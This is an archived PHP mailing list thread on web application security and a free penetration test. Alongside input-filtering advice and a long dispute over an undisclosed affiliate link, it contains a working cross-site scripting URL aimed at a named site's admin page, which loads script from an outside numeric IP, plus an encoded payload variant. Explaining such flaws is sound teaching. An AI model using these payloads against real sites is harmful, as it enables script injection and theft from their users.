'fname'. Should a form field called 'fname' NOT be created?
Chris.
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Re: Free penetration test
Chris W. Parker wrote: One question. (Because I'm a lame brain when it comes to security as I'm not good at imagining how things can be exploited): Is it bad to give field names the same name as their database counterpart? i.e. In a database the first name column might be known as 'fname'. Should a form field called 'fname' NOT be created? As long as you recognize that you need to filter things appropriately it doesn't really matter. Application-level Web security is not that hard. There is just 1 rule to remember. Never trust anything that comes from the user. That includes all GET, POST and Cookie data, which most people understand. But it also includes the User Agent, the Referer, and even the Host header. Anything that comes across the wire in the request can be hacked. If you have written something and you'd like me to take a quick look for any obvious exploits, feel free to mail me privately. If your site requires a login, you can send me a test login if you want so I can dig a bit deeper, otherwise I will still prod it from the outside. I'm not going to hack into your server in any way, just prod your web application a little bit with various web requests. Server-level security is a completely different kettle of fish which mostly comes down to keeping up to date with OS-level security updates. So far about 80% of sites I have looked at have had pretty serious issues. Like that www.vlaamse-kern.com one where you could trick people into sending you their usernames and passwords pretty easily. -Rasmus -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] Re: Free penetration test
Rasmus Lerdorf mailto:[EMAIL PROTECTED] on Friday, May 27, 2005 11:58 AM said: You have all sorts of problems at that URL. To start with, here is a cross-site scripting hack: http://www.vlaamse-kern.com/yourstore-0.0.2-beta1/admin/?%22%3E%3Cscript %09 src%3D%22http://3423329163/v First of all, excellent example. Don't display arbitrary key names in hidden fields the way you are. What do you mean by arbitrary key names? Chris. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Re: Free penetration test
Chris W. Parker wrote:
Rasmus Lerdorf mailto:[EMAIL PROTECTED]
on Friday, May 27, 2005 11:58 AM said:
You have all sorts of problems at that URL. To start with, here is
a cross-site scripting hack:
http://www.vlaamse-kern.com/yourstore-0.0.2-beta1/admin/?%22%3E%3Cscript
%09
src%3D%22http://3423329163/v
First of all, excellent example.
Don't display arbitrary key names in hidden fields the way you are.
What do you mean by arbitrary key names?
He was apparently doing something along the lines of:
foreach($_GET as $key=$val) {
echo EOL
input type=hidden name=$key value=$val
EOL;
}
Probably just a lazyness thing. Generally you will want to keep track
of which query args are actually valid and not just parrot whatever you
get back to the user. Or if you are going to do do it this way,
recognize that you have to filter/encode both the query arg names and
the values.
-Rasmus
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Re: Free penetration test
On Saturday 28 May 2005 01:05, Chris W. Parker wrote: Rasmus Lerdorf mailto:[EMAIL PROTECTED] on Friday, May 27, 2005 11:58 AM said: You have all sorts of problems at that URL. To start with, here is a cross-site scripting hack: http://www.vlaamse-kern.com/yourstore-0.0.2-beta1/admin/?%22%3E%3Cscript %09 src%3D%22http://3423329163/v First of all, excellent example. Don't display arbitrary key names in hidden fields the way you are. What do you mean by arbitrary key names? In this example, what was going on was that I captured the parameters passed on the url, and included them as hiddens in a form. Since it was not properly escaped, the attack succeeds by inserting a variable with value script type=text/javascript src=somewhere/script But then url encoded: %22%3E+%3Cscript+type%3D%09ext%2Fjavascript+src%3D%22somewhere%22%3E%3C%2Fscript%3E Which translates in the html document to: form... input type=hidden name=script type=text/javascript src=somewhere/script ... -- Registered Linux User Number 379093 -- --BEGIN GEEK CODE BLOCK- Version: 3.1 GAT/O/E$ d-(---)+ s:(+): a--(-)? C$(+++) UL$ P-(+)++ L+++$ E---(-)@ W++$ !N@ o? !K? W--(---) !O !M- V-- PS++(+++) PE--(-) Y+ PGP++(+++) t+(++) 5-- X++ R*(+)@ !tv b-() DI(+) D+(+++) G(+) e$@ h++(*) r--++ y--() -- ---END GEEK CODE BLOCK-- -- Check out these few php utilities that I released under the GPL2 and that are meant for use with a php cli binary: http://www.vlaamse-kern.com/sas/ -- -- -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Re: Free penetration test
Hi, I have requested the free test several times and it was very useful because it brought my attention to aspects that I was not considering, some related to PHP in specific and other related to Internet in general. fair enough, you could have given him the link the the page directly _without_ your affiliate add on code, but since you did tack your aff code on, I think you should have mentioned it That would be irrelevant because nothing changes for the anybody that follows the link with or without the aff code. The service is still free and the service is the same. Not really, the service is still the same... true, but what happens if he decides to buy one more scan (49$) from that site or decides to buy a 1 month scanning option ($119) or 1 year scanning ($899)? Does a little birdie get 35% (recurring) of that? as you get 35% (minimum, for upto a year) if he signs up...not that anybodys bothered if you make money That is false. If he signs up and tries the free penetration test service that he asked and I suggested, I do not gain anything. Stop deceiving people! My bad there, while typeing the first email I meant if he signs up for a paid plan instead I wrote if he signs up... If I ever gain anything with the referral, he would not be paying more for whatever services he would order. -- Never said would be paying he extra, but the point is you would be making money off him (not a bad thing again) without his knowledge (bad thing)...if he finds the link really useful I think to show his appreciation he would _make sure_ your affiliate link is tacked there..I would. Stop distorting the facts. You are implying that I acting with malice by stating that I will make money by hiding facts when a) Andy never asked explicitly for a service that the referer would not gain anything b) I am not hiding anything as the affiliate id is quite visible in the URL c) I never denied that the URL contains my affiliate id. You keep saying distorting the facts, which is quite strange because this whole discussion took a turn because you in a way distorted the facts by not telling the person you were helping that you may be making money off him without his knowledge. Andy never asked explicitly for a service that the referer would not gain anything True, but if want to play that game, he never mentioned that he was looking for someone to mention a site/resource where the referrer was gaining OR not gaining anything...which is kind of stupid because when we write to the list we dont think we are making a deal with the devil so we have to cover all points and angles. This is PHP (help) list, not a list on how to best write a help email so it would hold up in a court of law- I am not hiding anything as the affiliate id is quite visible in the URL Unfortunatly for you thats quite true...and thats how this whole thing turned because I saw it, but many people (maybe Andy too) dont know what it means when someone gives them a URL with an affiliate id tacked to the end of it, common decency is to tell the person that you have a connection with that site. I never denied that the URL contains my affiliate id. If you did you would be reay stupid, and nobody is accusing you of being that. - If I am acting with malice as you suggest just because I did not mention that the URL contained my affiliate id, what would you say about the PHP group that lists a pile of books in Amazon linked with their affiliate id but they do not mention that fact anywhere in their pages? http://www.php.net/books.php -- Ummm. this is whats written on the page: If you buy the book using the links on this page, you are helping to support PHP development! Lucky for me, English is my mother tongue but I think even if it was'nt and my IQ was quite a bit lower I would still the idea that if I buy a book using one of those links the site was gaining from it. Why? because they are being open,decent AND honest about it, see the If you buy the book using the links .you are helping to support parts? Maybe I am Darth Vader and the PHP Group is the whole dark side of the force. And you tell me I am being ridiculous! clip Another example, I am an affilate of interland, if someone asks about dedicated hosting I could send them there they would join, not pay a cent extra, but i get a commision *without their knowledge* (10% recurring)... am I helping them or myself? Yeah, right, you are fighting the dark side of the force to be the good guy that just lives from the air that you breath and nobody else should be allowed to gain anything from referrals unless you warn users that you refer that you are keeping a commission, despite the price is always the same!?! /clip People on this list are some of the best people I have even had the privilage of helping and being helped by...they are not really out to sucker anyone or for self gain..they help to help, no
Re: [PHP] Re: Free penetration test
Hello, on 05/27/2005 05:30 PM Rory Browne said the following: You may want to try Security Space services. They perform many types of security checks remotely including penetration tests that may reveal serious vulnerabilities in your servers. Such vulnerabilities include holes, in your server OS version, Web and e-mail servers and even in the PHP version that you may have installed. You can try their no risk test in this page that is free and in a few minutes after the test is request you get a full report by e-mail. http://www.securityspace.com/smysecure/norisk_index.html?refid=1057382149 Umm, you forgot to mention that you are connected to that site and you get a commision for sending them clients, if they sign up. Nothing wrong with getting an affiliate buck mind you, I have a few affiliate accounts around too, but I (and others on the list i have noticed, Jay B for one) mention that we are connected to / own the websites we are sending the person to. I did not forget to mention anything. Andy asked for a free penetration test and that is exactly what he gets going to the page mentioned above. We generally like to know however if there is potential bias in links we are being given. There is nothing to be concerned about any bias because a) I am recommending a free service that anybody can try and evaluate and post an opinion, b) I said I tried it, it does what the original poster asked and nobody has demonstrated otherwise, c) the link is in plain text so that everybody can see the referral id, so I am not hiding anything, if I had I would not be here clarifying the facts. -- Regards, Manuel Lemos PHP Classes - Free ready to use OOP components written in PHP http://www.phpclasses.org/ PHP Reviews - Reviews of PHP books and other products http://www.phpclasses.org/reviews/ Metastorage - Data object relational mapping layer generator http://www.meta-language.net/metastorage.html -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Re: Free penetration test
Hello, on 05/27/2005 06:46 PM Ryan A said the following: - I have requested the free test several times and it was very useful because it brought my attention to aspects that I was not considering, some related to PHP in specific and other related to Internet in general. - fair enough, you could have given him the link the the page directly _without_ your affiliate add on code, but since you did tack your aff code on, I think you should have mentioned it That would be irrelevant because nothing changes for the anybody that follows the link with or without the aff code. The service is still free and the service is the same. as you get 35% (minimum, for upto a year) if he signs up...not that anybodys bothered if you make money That is false. If he signs up and tries the free penetration test service that he asked and I suggested, I do not gain anything. Stop deceiving people! -- If I ever gain anything with the referral, he would not be paying more for whatever services he would order. -- Never said he would be paying extra, but the point is you would be making money off him (not a bad thing again) without his knowledge (bad thing)...if he finds the link really useful I think to show his appreciation he would _make sure_ your affiliate link is tacked there..I would. Stop distorting the facts. You are implying that I acting with malice by stating that I will make money by hiding facts when a) Andy never asked explicitly for a service that the referer would not gain anything b) I am not hiding anything as the affiliate id is quite visible in the URL c) I never denied that the URL contains my affiliate id. If I am acting with malice as you suggest just because I did not mention that the URL contained my affiliate id, what would you say about the PHP group that lists a pile of books in Amazon linked with their affiliate id but they do not mention that fact anywhere in their pages? http://www.php.net/books.php Maybe I am Darth Vader and the PHP Group is the whole dark side of the force. Get real, you are being ridiculous! Another example, I am an affilate of interland, if someone asks about dedicated hosting I could send them there they would join, not pay a cent extra, but i get a commision *without their knowledge* (10% recurring)... am I helping them or myself? Yeah, right, you are fighting the dark side of the force to be the good guy that just lives from the air that you breath and nobody else should be allowed to gain anything from referrals unless you warn users that you refer that you are keeping a commission, despite the price is always the same!?! - So, I do not see your point in bugging me for this. If you feel that I am not helping Andy, I would appreciate that you tell me that directly!' - Well, all i can say is, if my little email bugged you, you either get bugged very easily or you know I'm right! Look, you challenged my credibility by distorting the facts. Of course that bugs me because for 8 years I have been participating in PHP mailing lists helping people leading to solutions to the problems that they pose, and your attitude is misleading people into believing that I am not helping them. You have caused such confusion that Andy, the original poster, have written me privately telling that he thought that the link that I suggested pointed to a site of mine where I was selling security auditing services, when in fact the only person that doing that in this thread was Chris Shiflet. I just recommended a service that I tried, and so I have first hand experience to comment about, unlike you that not only just caused confusion but also did not offer any solution to the problem posed by Andy. Basically you are not helping because all you did is to bug somebody that tried to help. -- Regards, Manuel Lemos PHP Classes - Free ready to use OOP components written in PHP http://www.phpclasses.org/ PHP Reviews - Reviews of PHP books and other products http://www.phpclasses.org/reviews/ Metastorage - Data object relational mapping layer generator http://www.meta-language.net/metastorage.html -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
